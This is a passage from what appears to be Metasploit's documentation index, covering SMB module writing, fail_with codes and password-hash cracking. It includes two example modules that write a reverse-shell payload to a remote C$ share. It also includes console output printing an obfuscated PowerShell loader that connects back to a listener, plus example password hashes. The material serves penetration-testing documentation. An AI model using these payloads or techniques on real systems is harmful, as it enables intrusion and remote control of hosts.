    "content": "SMB (Server Message Block) is a network communication protocol that provides file sharing, network browsing, printing services, and interprocess communication over a network. It relies on lower level protocol transports: . | NetBIOS . | over TCP/IP (NBT) on 137/UDP, 138/UDP, 137/TCP and 139/TCP | over NetBEUI | . | Directly over TCP on 445/TCP (by far the most commonly used) | . CIFS is a particular implementation of SMB created by Microsoft based on the original IBM specifications. It has been replaced by SMB v1.0, which is a set of Microsoft extensions to MS-CIFS. SMB2 is a complete rewrite of the protocol which primarily aims to reduce the number of messages exchanged between the client and the server. SMB v2.0 was introduced in Windows Vista/Server 2008. It also brings some new features such as: . | Pipelining | Symbolic links | Improved large file transfers | Better signing | New opportunistic locking mechanism | . SMB v2.1 was added to Windows 7/Server 2008 R2 with a few improvements: . | Minor performance enhancements | New opportunistic locking mechanism | . SMB3 adds some interesting features and was introduced in Windows 8/Server 2012. Here are some new capabilities added by the SMB v3.0 dialect: . | SMB Direct (SMB over remote direct memory access - RDMA) | SMB Multichannel (multiple connections per SMB session) | SMB Transparent Failover (useful for clustered file servers) | Per-share encryption (AES-128 CCM) and AES-based signing | . SMB v3.0.2 (from Windows 8.1/Server 2012 R2) only adds some small improvements. Finally, SMB v3.1.1 (from Windows 10/Server 2016) introduces the following features: . | Negotiation of encryption and integrity algorithms | AES-128 GCM encryption | Pre-authentication integrity check (SHA-512) | Compression | . ",
    "url": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#smb-protocol-overview",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#smb-protocol-overview"
  },"185": {
    "doc": "Guidelines for Writing Modules with SMB",
    "title": "Common SMB Packet Exchange Scenarios",
    "content": ". | NetBIOS session establishment This step is only required if NetBIOS over TCP (NBT) transport is used. This is not very common anymore, since SMB over TCP (from Windows 2000) removed the NetBIOS transport layer. In case a NetBIOS session needs to be established, this must be the first packet exchange. | Negotiation This is where the SMB protocol version and dialect are going to be negotiated between the client and the server. From SMB v3.1.1, encryption/compression capabilities are also negotiated at the same time. | Authentication Depending on the authentication scheme, this step requires one or two packet exchanges. NTLM challenge-response, the only authentication protocol supported by RubySMB at the time of writing, consists of first sending a Session Setup packet containing the client capabilities. The server responds with a challenge. Then, another Session Setup request is sent with the challenge response. If it is accepted, the server returns a Session ID that will be used in subsequent requests. This defines the beginning of an SMB Session. | . Fig.1 - Negotiation & authentication packet exchanges . | Connect to a share Once the SMB session is established, the SMB client must connect to a remote share. This is done by sending a TreeConnect request and getting a Tree ID. This identifier will be used by subsequent file operations on this share. | File operation From there, the client can execute any file operation on the remote share, such as open, read, write, delete, rename, etc. When the client is done with a file, it can simply close the handle. The Tree ID remains valid and can be reused. | . Fig.2 - Connect to share & read file packet exchanges . | Close tree and session The client can decide to release the connection to the share at any time by sending a TreeDisconnect request. Note that the SMB session will remain active until the client sends a Logoff packet, which defines the end of the SMB Session. | . ",
    "url": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#common-smb-packet-exchange-scenarios",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#common-smb-packet-exchange-scenarios"
  },"186": {
    "doc": "Guidelines for Writing Modules with SMB",
    "title": "Module Writing",
    "content": "Using the default MSF client . The following mixin will bring everything you need, including the main MSF SMB Client. include Msf::Exploit::Remote::SMB::Client::Authenticated . Following the same workflow described above: . | Initialization | . The first step is to initialize the client by invoking connect. The version(s) that will be negotiated can also be set up by passing an array to the keyword arguments versions. For example, to negotiate any dialect of SMB version 2 and 3, use this: . connect(versions: [2, 3]) . The default is to negotiate versions 1, 2 and 3. Note that the client will just let the SMB server know which versions and dialects it supports. The server will always choose the latest version it supports. This means, Windows 7 will always choose SMB v2.1 (SMB3 has been added to Windows 8 only), even if versions 1, 2 and 3 are advertised by the client. If SMB2 is disabled on this host for whatever reason, the SMB server will fall back to SMB1. By choosing which versions the client must negotiate, you can force the server to use a specific protocol version, assuming it is supported and enabled. From Metasploit 6, the MSF client uses RubySMB under the hood by default for any SMB protocol version. For compatibility with older modules, it is still possible to force the client to use the original Rex SMB implementation. Note that this is not recommended and RubySMB should be the default for new modules. This can be done by explicitly negotiate SMB1 only (Rex only supports this version): . connect(versions: [1]) . | NetBIOS session, negotiation and authentication | . The actual negotiation and authentication are handled by smb_login. This retrieves the NetBIOS name, user name, password and domain from the SMBName, SMBUser, SMBPass and SMBDomain options set by the operator, respectively. Other options can be set and are defined in MSF SMB client. 
Under the hood, smb_login establishes the NetBIOS session (if needed), negotiates the protocol version/dialect and sets up the SMB session using the NTLM challenge-response authentication protocol. If, for whatever reason, the authentication options cannot be retrieved from the user options, it is still possible to provide them manually by calling simple.login() directly (see SimpleClient#login): . simple.login(name, user, pass) . Note that simple is the Rex::Proto::SMB::SimpleClient object and is accessible anywhere in the module. This is the main interface to interact with RubySMB (more on that later). | Connect to a share | . This is done by invoking simple.connect: . simple.connect(\"\\\\\\\\<host>\\\\<share>\") . | File operations | . | read a file file_path = 'file/path/relative/to/the/share/root' file = smb_open(file_path, 'o') print_status(\"File content: #{file.read}\") file.close . See SimpleClient#open and RubySMB::Dispositions for details about the smb_open mode argument. | write to a file file = smb_open(file_path, 'co', write: true) file << \"my file data\" file.close . | delete a file simple.delete(file_path) . | . | Close the connection to the remote share | . simple.disconnect(\"\\\\\\\\<host>\\\\<share>\") . Since Metasploit 6, two new options were introduced to control version negotiation and encryption. These options are only available when using the default MSF SMB client and are automatically pulled in with the Msf::Exploit::Remote::SMB::Client or Msf::Exploit::Remote::SMB::Client::Authenticated mixins: . | SMB::ProtocolVersion: one SMB protocol version, or a comma-separated list of versions, to negotiate (e.g. “1” or “1,2” or “2,3,1”). | SMB::AlwaysEncrypt: enforces encryption even if the server does not require it (SMB3.x only). When it is set to false, the SMB client will still encrypt the communication if the server requires it. | . Using RubySMB client directly . 
This mixin is not required but can be useful to expose the SMB-related options to the operator: . include Msf::Exploit::Remote::SMB::Client::Authenticated . An alternative is to register the options we need in initialize: . register_options([ OptString.new('SMBUser', [ false, 'The username to authenticate as', '']), OptString.new('SMBPass', [ false, 'The password for the specified username', '']), OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication', '.']), ]) . Following the same workflow described above: . | Initialization | . | set up the dispatcher dispatcher = RubySMB::Dispatcher::Socket.new(sock) . | initialize the client SMB versions 1, 2 and 3 will be negotiated by default. Use the smb1, smb2 and smb3 keyword arguments to disable a version (false value). See RubySMB::Client#initialize for more initialization options client = RubySMB::Client.new(dispatcher, username: datastore['SMBUser'], password: datastore['SMBPass'], domain: datastore['SMBDomain']) . | . | Negotiation | . client.negotiate . | Authentication | . client.authenticate . | Connect to a share | . tree = client.tree_connect(\"\\\\\\\\<host>\\\\<share>\") . | File operations | . file_path = 'file/path/relative/to/the/share/root' . | read a file (see RubySMB::SMB1::Tree and RubySMB::SMB2::Tree for details) file = tree.open_file(filename: file_path) data = file.read file.close . | write to a file file = tree.open_file(filename: file_path, write: true, disposition: RubySMB::Dispositions::FILE_OPEN_IF) file.write(data: 'my data') file.close . | delete a file file = tree.open_file(filename: file_path, delete: true) file.delete file.close . | . | Close the connection to the remote share | . tree.disconnect! . | Close the SMB session | . client.disconnect! . ",
    "url": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#module-writing",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#module-writing"
  },"187": {
    "doc": "Guidelines for Writing Modules with SMB",
    "title": "Examples",
    "content": "Using the default MSF client . modules/exploits/windows/smb/msf_smb_client_test.rb . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule &amp;lt; Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client::Authenticated def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'MSF SMB Client Test', 'Description' =&amp;gt; %q( This module simply write, read and delete a file on the remote host using default MSF SMB client. ), 'License' =&amp;gt; MSF_LICENSE, 'Author' =&amp;gt; [ 'Christophe De La Fuente' ], 'Platform' =&amp;gt; 'windows', 'Arch' =&amp;gt; ARCH_CMD, 'Targets' =&amp;gt; [[ 'Windows', {} ]], 'DefaultOptions' =&amp;gt; { 'PAYLOAD' =&amp;gt; 'cmd/windows/powershell_reverse_tcp' } ) ) end def exploit connect smb_login share = \"\\\\\\\\#{rhost}\\\\C$\" simple.connect(share) file_path = 'Windows\\\\Temp\\\\payload.bat' print_status(\"Create and write to #{file_path} on #{share} remote share\") file = smb_open(file_path, 'co', write: true) file &amp;lt;&amp;lt; payload.encode file.close print_status(\"Read #{file_path} on #{share} remote share\") file = smb_open(file_path, 'o') print_status(\"File content: #{file.read}\") file.close print_status(\"Delete #{file_path} on #{share} remote share\") simple.delete(file_path) ensure simple.disconnect(share) if simple end end . msfconsole output: . msf6 exploit(windows/smb/msf_smb_client_test) &amp;gt; options Module options (exploit/windows/smb/msf_smb_client_test): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 172.16.60.128 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 445 yes The SMB service port (TCP) SMBDomain . 
no The Windows domain to use for authentication SMBPass ABCDEFG no The password for the specified username SMBUser smbuser no The username to authenticate as Payload options (cmd/windows/powershell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.16.60.1 yes The listen address (an interface may be specified) LOAD_MODULES no A list of powershell modules separated by a comma to download over the web LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows msf6 exploit(windows/smb/msf_smb_client_test) > run [*] Started reverse SSL handler on 172.16.60.1:4444 [*] 172.16.60.128:445 - Create and write to Windows\\Temp\\payload.bat on \\\\172.16.60.128\\C$ remote share [*] 172.16.60.128:445 - Read Windows\\Temp\\payload.bat on \\\\172.16.60.128\\C$ remote share [*] 172.16.60.128:445 - File content: powershell.exe -nop -w hidden -noni -ep bypass \"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))\" [*] 172.16.60.128:445 - Delete Windows\\Temp\\payload.bat on \\\\172.16.60.128\\C$ remote share [*] Exploit completed, but no session was created. Using RubySMB client directly . modules/exploits/windows/smb/ruby_smb_client_test.rb . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Exploit::Remote::Tcp def initialize(info = {}) super( update_info( info, 'Name' => 'RubySMB Client Test', 'Description' => %q( This module simply writes, reads and deletes a file on the remote host using the default RubySMB client. 
), 'License' => MSF_LICENSE, 'Author' => [ 'Christophe De La Fuente' ], 'Platform' => 'windows', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Windows', {} ]], 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' } ) ) register_options([ OptString.new('SMBUser', [ false, 'The username to authenticate as', '']), OptString.new('SMBPass', [ false, 'The password for the specified username', '']), OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication', '.']), ]) end def exploit sock = connect dispatcher = RubySMB::Dispatcher::Socket.new(sock) client = RubySMB::Client.new(dispatcher, username: datastore['SMBUser'], password: datastore['SMBPass'], domain: datastore['SMBDomain'], always_encrypt: false) client.negotiate client.authenticate share = \"\\\\\\\\#{rhost}\\\\C$\" tree = client.tree_connect(share) file_path = 'Windows\\\\Temp\\\\payload.bat' print_status(\"Create and write to #{file_path} on #{share} remote share\") file = tree.open_file(filename: file_path, write: true, disposition: RubySMB::Dispositions::FILE_OPEN_IF) file.write(data: payload.encode) file.close print_status(\"Read #{file_path} on #{share} remote share\") file = tree.open_file(filename: file_path) print_status(\"File content: #{file.read}\") file.close print_status(\"Delete #{file_path} on #{share} remote share\") file = tree.open_file(filename: file_path, delete: true) file.delete file.close ensure tree.disconnect! if tree client.disconnect! if client end end . msfconsole output: . msf6 exploit(windows/smb/ruby_smb_client_test) > options Module options (exploit/windows/smb/ruby_smb_client_test): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 172.16.60.128 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The target port (TCP) SMBDomain . 
no The Windows domain to use for authentication SMBPass ABCDEFG no The password for the specified username SMBUser smbuser no The username to authenticate as Payload options (cmd/windows/powershell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.16.60.1 yes The listen address (an interface may be specified) LOAD_MODULES no A list of powershell modules separated by a comma to download over the web LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows msf6 exploit(windows/smb/ruby_smb_client_test) > run [*] Started reverse SSL handler on 172.16.60.1:4444 [*] 172.16.60.128:445 - Create and write to Windows\\Temp\\payload.bat on \\\\172.16.60.128\\C$ remote share [*] 172.16.60.128:445 - Read Windows\\Temp\\payload.bat on \\\\172.16.60.128\\C$ remote share [*] 172.16.60.128:445 - File content: powershell.exe -nop -w hidden -noni -ep bypass \"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAA3UKl8CA51WXW/bNhR996+48LRaQizCNroOCJBirpJuAbLWqLzlwTAQmrqOtcikR1L+QOL/XlKiLDlO0GV6sUVennvuuR/UTzASG5TznEMItzLVGjnMdvDJ/IxzyVHCO7ika4Q/qEx2rZaxZDoVHH5HHd7ijGUpcg2txxaYx9swuIAvuAm/zv5BpiEc71b4hS7RLGpi7KPCvjImfym8xDnNMx1JTMxOSjNlIDwtczxYjaTY7sgzC7PeWKlsW/ua4qoKrfUIxf6ISrr0y/+TWMuU30+9SCyXlCfd49VYZUzwZ4uXYsMzQZNiNXCYUjBUCpwAS5HkGVqCv/kBlCbpHPzKDYT4L7RnKU/aQbFZnivOZqky8hvJL4zLnfm/JFa1WLAH1IqM2erGWUzfm+f0IFGaSm39Os/FrkvRRcNuyBiutAEs0+GXVPav0ZW4RqnwlPEBupHyl5hHI+eo3f91QPofyIce6be7NgrnulXKp7REurRcS2hiyiwu1gzHml2ZnZKcrZS2S0aDmlJZXIG9wg5Zbip+R+LK1Hf+u97clBR2/UdvbND3EFIFk6Mz33ApNEYodTpPGdX4N83ShNq6i2iWzSh7mAbBC3TIMNcLW7T20FC9pEvQSF4tSB1QU7HJbKdxMp169teWXY+QQc88Tz8/9vZOVORJte1PNG41Qc5EYmv6/HwYR9fXgRX6k7Xx27emOMVGlZMhXmCWgcw5N9ZgZMiVKdA2nIGHfH1u37ht7zOzZjJy2GBiucp1vXnHI7HayfR+ocGPAhj0+r/AnymTQom5hkjIlZCFfASG1qO1VCDROFhjQu74HXf15zQhdlyhX0fX7XXrF3KD/F4vmkVTdW+zbE6q5m1STc6mcGMgrTau88mB59u5Vqc+C3lF2cJwLkEh5YfJUlvVtO3jHw3kgFTRlrOrQgqervlaPGB4tV0ZbZXR+4CyP+7ENynRGcXQMXkuWNwIVmQyICOqF2a187Hzv1O3WaQZ+r6XFj1QHv+GNPHLiu9Crwve0bkAQo7QO8ntlaWPydiE8tol5aaDNSFFiFcu5BrF9Di1VBpobkgVMlfhgJcGz8rKjASr5UkCIKyGbQk++PiuD0/wNddhiQpOiiOoARSCVMBG5B+kADo1yNYS8VBKISe96ZGzButin7AMqfSDlxhcNF9M429bp530n8qnhvlh6zRL5aRxqjOfs1wtDvevG4PuRokyodDFU9+IsRar6ho03xCtw7fDITnuEoTQXT52gHwHT7D+aT8JAAA='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))\" [*] 172.16.60.128:445 - Delete Windows\\Temp\\payload.bat on \\\\172.16.60.128\\C$ remote share [*] Exploit completed, but no session was created. ",
    "url": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#examples",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html#examples"
  },"188": {
    "doc": "Guidelines for Writing Modules with SMB",
    "title": "Guidelines for Writing Modules with SMB",
    "content": "This is a simple guideline to write SMB-based modules, focusing on the new RubySMB implementation that includes SMB3 support. ",
    "url": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html",
    "relUrl": "/docs/development/developing-modules/libraries/smb_library/guidelines-for-writing-modules-with-smb.html"
  },"189": {
    "doc": "Fail_with",
    "title": "On this page",
    "content": ". | Example uses | Comprehensive list of fail_with parameters | . When a module fails, the fail_with method provides a standardized way to describe the reason for the failure. The first parameter depends on the cause of the failure. ",
    "url": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html#on-this-page",
    "relUrl": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html#on-this-page"
  },"190": {
    "doc": "Fail_with",
    "title": "Example uses",
    "content": "modules/exploits/osx/local/sudo_password_bypass.rb fails using Failure::NotVulnerable if the check method does not indicate that the target is vulnerable: . if check != CheckCode::Vulnerable fail_with Failure::NotVulnerable, 'Target is not vulnerable' end . modules/exploits/multi/http/struts2_namespace_ognl.rb fails using the Failure::PayloadFailed if the target’s response does not include a string indicating that the payload successfully executed. Alternatively, if the target responds with an HTTP error, the module invokes fail_with using the Failure::UnexpectedReply parameter: . if r &amp;amp;&amp;amp; r.headers &amp;amp;&amp;amp; r.headers['Location'].split('/')[1] == success_string print_good(\"Payload successfully dropped and executed.\") elsif r &amp;amp;&amp;amp; r.headers['Location'] vprint_error(\"RESPONSE: \" + r.headers['Location']) fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\") elsif r &amp;amp;&amp;amp; r.code == 400 fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\") end . ",
    "url": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html#example-uses",
    "relUrl": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html#example-uses"
  },"191": {
    "doc": "Fail_with",
    "title": "Comprehensive list of fail_with parameters",
    "content": "The following are currently used fail_with parameters and a brief description of common uses. | fail_with parameter | Reason for failure | . | Failure::BadConfig | The user-provided parameters are invalid and must be corrected. | . | Failure::Disconnected | The target closed the connection forcibly. | . | Failure::NoAccess | An attempt to authenticate failed, likely due to invalid credentials. | . | Failure::None | The outcome for the module has already been met, for example a privilege escalation is already in an elevated context) | . | Failure::NoTarget | The specified TARGET or PAYLOAD variables are misconfigured or the target environment is unsupported. | . | Failure::NotFound | A preexisting file or resource on target is missing. | . | Failure::NotVulnerable | The target returned a response indicative of being patched or otherwise mitigated. | . | Failure::PayloadFailed | A return code from payload execution indicates the payload did not execute or terminated unexpectedly. | . | Failure::TimeoutExpired | The target did not respond to the connection request in a timely manner. Check RHOSTS and RPORT, then consider increasing WFSDelay. | . | Failure::UnexpectedReply | The target responded in an entirely unexpected way, and may not be running the vulnerable service at all. | . | Failure::Unknown | An entirely unexpected exception occurred, and the target may not be running the expected services at all. | . | Failure::Unreachable | The host or service is not reachable, often indicated by a refused connection or ICMP “unreachable” message. | . ",
    "url": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html#comprehensive-list-of-fail_with-parameters",
    "relUrl": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html#comprehensive-list-of-fail_with-parameters"
  },"192": {
    "doc": "Fail_with",
    "title": "Fail_with",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html",
    "relUrl": "/docs/development/developing-modules/libraries/handling-module-failures-with-fail_with.html"
  },"193": {
    "doc": "Hashes and Password Cracking",
    "title": "Intro",
    "content": "This article will discuss the various libraries, dependencies, and functionality built in to metasploit for dealing with password hashes, and cracking them. In general, this will not cover storing credentials in the database, which can be read about here. Metasploit currently support cracking passwords with John the Ripper and hashcat. ",
    "url": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#intro",
    "relUrl": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#intro"
  },"194": {
    "doc": "Hashes and Password Cracking",
    "title": "Hashes",
    "content": "Many modules dump hashes from various software. Anything from the OS: Windows, OSX, and Linux, to applications such as postgres, and oracle. Similar, to the hash-identifier project, Metasploit includes a library to identify the type of a hash in a standard way. identify.rb can be given a hash, and will return the jtr type. Metasploit standardizes to John the Ripper’s types. While you may know the hash type being dumped already, using this library will help standardize future changes. ",
    "url": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#hashes",
    "relUrl": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#hashes"
  },"195": {
    "doc": "Hashes and Password Cracking",
    "title": "Hash Identify Example",
    "content": "In this first, simple, example we will simply show loading the library and calling its function. require 'metasploit/framework/hashes/identify' puts identify_hash \"$1$28772684$iEwNOgGugqO9.bIz5sk8k/\" # note, bad hashes return an empty string since nil is not accepted when creating credentials in msf. puts identify_hash \"This_is a Fake Hash\" puts identify_hash \"_9G..8147mpcfKT8g0U.\" . In practice, we receive the following output from this: . msf5 &amp;gt; irb [*] Starting IRB shell... [*] You are in the \"framework\" object irb: warn: can't alias jobs from irb_jobs. &amp;gt;&amp;gt; require 'metasploit/framework/hashes/identify' =&amp;gt; false &amp;gt;&amp;gt; puts identify_hash \"$1$28772684$iEwNOgGugqO9.bIz5sk8k/\" md5 =&amp;gt; nil &amp;gt;&amp;gt; puts identify_hash \"This_is a Fake Hash\" =&amp;gt; nil &amp;gt;&amp;gt; puts identify_hash \"_9G..8147mpcfKT8g0U.\" des,bsdi,crypt . ",
    "url": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#hash-identify-example",
    "relUrl": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#hash-identify-example"
  },"196": {
    "doc": "Hashes and Password Cracking",
    "title": "Crackers",
    "content": "Differences Between Hashcat vs JtR . This section will cover the differences between the two crackers. This is not a comparison of speed, or why one may work better in a specific case than another. General Settings . | Description | JtR | hashcat | . | session | --session | --session | . | no logging | --no-log | --logfile-disable | . | config file | --config | (n/a) | . | previous cracks | --pot | --potfile-path | . | type of hashes | --format | --hash-type | . | wordlist | --wordlist | (last parameter) | . | incremental | --incremental | --increment | . | rules | --rules | --rules-file | . | max run time | --max-run-time | --runtime | . | show results | --show | --show | . Hash Setting . | Hash | JtR | hashcat | . | List formats | john --list=formats john --list=format-all-details | hashcat -h | . | &nbsp; | &nbsp; | &nbsp; | . | cram-md5 | hmac-md5 | 10200 | . | des | descrypt | 1500 | . | md5 (crypt is $1$) | md5crypt | 500 | . | sha1 | &nbsp; | 100 | . | bsdi | bsdicrypt | 12400 | . | sha256 | sha256crypt | 7400 | . | sha512 | sha512crypt | 1800 | . | blowfish | bcrypt | 3200 | . | lanman | lm | 3000 | . | NTLM | nt | 1000 | . | mssql (05) | mssql | 131 | . | mssql12 | mssql12 | 1731 | . | mssql (2012/2014) | mssql05 | 132 | . | oracle (10) | oracle | 3100 | . | oracle 11 | oracle11 | 112 | . | oracle 12 | oracle12c | 12300 | . | postgres | dynamic_1034 | 12 | . | mysql | mysql | 200 | . | mysql-sha1 | mysql-sha1 | 300 | . | sha512($p.$s) - vmware ldap | dynamic_82 | 1710 | . | md5 (raw, unicode) | Raw-MD5u | 30 (with an empty salt) | . | NetNTLMv1 | netntlm | 5500 | . | NetNTLMv2 | netntlmv2 | 5600 | . | pbkdf2-sha256 | PBKDF2-HMAC-SHA256 | 10900 | . | Android (Samsung) SHA1 | &nbsp; | 5800 | . | Android (non-Samsung) SHA1 | &nbsp; | 110 | . | Android MD5 | &nbsp; | 10 | . | xsha | xsha | 122 | . | xsha512 | xsha512 | 1722 | . | PBKDF2-HMAC-SHA512 | PBKDF2-HMAC-SHA512 | 7100 | . | PBKDF2-HMAC-SHA1 | PBKDF2-HMAC-SHA1 | 12001 | . 
| PHPass | phpass | 400 | . | mediawiki | mediawiki | 3711 | . While Metasploit standardizes on the JtR format, the hashcat library includes the jtr_format_to_hashcat_format function to translate from jtr to hashcat. Cracker Modes . Each cracker mode is a set of rules that apply only to that mode, so that any optimizations can be applied within a mode and reset when switching to another. These modes include: . | Incremental | Wordlist | Pin (mobile devices - hashcat specific) | Normal (jtr specific) | Single (jtr specific) | . Hashcat Optimized Kernel . Hashcat contains a -O flag which uses an optimized kernel. From internal testing it looks to be >200% faster, with a trade-off on the supported password length. For more information see https://github.com/rapid7/metasploit-framework/pull/12790 . Exporting Passwords and Hashes . Hashes can be exported to three different file formats by using the creds command and specifying an output file with the -o option. When the file ends in .jtr or .hcat, the John the Ripper or Hashcat format will be used respectively. Any other file suffix will result in the data being exported in CSV format. Warning: When exporting in either the John the Ripper or Hashcat format, any hashes that cannot be handled by the formatter will be omitted. See the Adding a New Hash section for details on updating the formatters. Exported hashes can be filtered by a few fields such as the username and realm. One additional useful field is the hash type, which can be specified with the -t/--type option. The type can be password, ntlm, hash or any of the John the Ripper format names such as netntlmv2. Example to export all NetNTLMv2 secrets for the WORKGROUP realm for use with John the Ripper: creds --realm WORKGROUP --type netntlmv2 -o /path/to/netntlmv2_hashes.jtr . ",
    "url": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#crackers",
    "relUrl": "/docs/using-metasploit/intermediate/hashes-and-password-cracking.html#crackers"
  },"197": {
    "doc": "Hashes and Password Cracking",
    "title": "Example Hashes",
    "content": "Hashcat . | hashcat.net | . JtR . | pentestmonkey.net | openwall.info | . For testing Hashcat/JtR integration, this is a common list of commands to import example hashes of many different types. When possible the username is separated by an underscore, and anything after it is the password. For example des_password, the password for the hash is password: . # nix creds add user:des_password hash:rEK1ecacw.7.c jtr:des creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5 creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf # windows creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt creds add user:u4-netntlm hash:u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c jtr:netntlm creds add user:admin hash:admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030 jtr:netntlmv2 creds add user:mscash-test1 hash:M$test1#64cd29e36a8431a2b111378564a10631 jtr:mscash creds add user:mscash2-hashcat hash:$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f jtr:mscash2 # sql creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05 creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql creds add 
user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12 creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1 ## oracle (10) uses usernames in the hashing, so we can't override that here creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle ## oracle 11/12 H value, username is used creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle ## oracle 11/12 uses a LONG format, see lib/msf/core/auxiliary/jtr.rb creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c ## postgres uses username, so we can't override that here creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860 # mobile creds add user:samsungsha1 